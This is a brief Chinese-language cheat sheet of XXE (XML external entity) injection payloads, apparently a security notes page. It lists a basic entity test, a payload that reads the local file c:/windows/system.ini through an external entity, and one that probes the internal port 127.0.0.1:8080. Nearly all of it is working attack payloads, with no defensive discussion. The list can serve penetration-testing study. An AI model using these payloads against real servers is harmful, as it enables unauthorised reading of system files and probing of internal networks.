目录
前提知识
XMT基础,DTD基础
常见payload
测试漏洞
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY coleak "xiao">
]>
<name>&coleak;</name>
读取文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE read [
<!ENTITY file SYSTEM "file:///c:/windows/system.ini"> ]>
<read>&file;</read>
探测端口
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root[
<!ELEMENT data ANY>
<!ENTITY XXE SYSTEM "http://127.0.0.1:8080">]>
<root>
<data>&XXE;</data>
</root>